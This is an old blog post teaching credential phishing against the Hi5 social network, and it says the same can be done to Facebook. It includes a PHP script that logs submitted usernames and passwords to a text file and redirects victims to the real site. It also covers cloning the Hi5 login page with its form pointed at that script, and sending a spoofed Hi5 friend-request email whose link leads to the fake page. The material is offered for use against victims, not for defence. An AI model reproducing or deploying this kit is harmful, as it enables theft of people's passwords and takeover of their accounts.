Tuesday, January 26, 2010

Phish it easy!!!

Creating a fake login page and some social engineering trick's.

1.) First part:Creating the Fake Login Page.
In this part of the tutorial I'm going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Hi5 as an example.

Part 1:
First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this code:

header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($ handle, "\r\n");
fclose($handle) ;

2.)Now save this as phish.php
header ('Location: http://www.hi5.com/friend/login.do ');

This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case hi5) and try to login without username and password.Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script.As you can see the hi5 has got "http://www.hi5.com/friend/login.do"
Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.

Part 2:

Now we go to http://www.hi5.com and right click / View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:

In this case we have:
action="/friend/login. do"

We replace that part with:

Then we copy the whole source and save this file as login.php.

Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.

The phishing link should be something like this:
http://something.awa...e.com/login. php ---> Send this to your victim

And the txt file with the passwords like this:
http://something.awa...m/passwords.txt ---> View the passwords with this one.

Another example of phishing link:

Don't log in on this one,Its my phishing link.
But of you do that wont bother me.smiley_XD.gif

The Fake Login Page proccess is over.

Second part:Deceiving the Victim.

Now in this part we are going to see how we can deceive our victims.The way i do it is like this.

1#.Go to your inbox and find a simple hi5 Friend Request.Copy it like in the picture:

Go to http://deadfake.com/Send.aspx , scroll down for a little and paste the invitation like this:

*Now select the "Accept Friend" line.
*Click the hyperlink button.
*Paste your phishing link there.
*Click OK button.
See the pic for more:

Now fill in the fields like this :

To: victimemail@dumb.com
From: info@hi5.com
Subject: Someone has sent you a hi5 Friend Request

Then enter the security code and click send.The e-mail will look like it came from hi5 just that it will redirect the victim to your phishing link instead of hi5.com

The same can be done for facebook and many more websites of your choice.

NOTE:There is a chance that the email wont be sent sometimes.So the best it would be to send it on your own inbox just before you send it to your victim.

Well that's it for today boys and girls.I know it was a long tutorial but believe me it will worth it once you mastered .Let me know what you think.

Happy Phishing.

No comments:

Post a Comment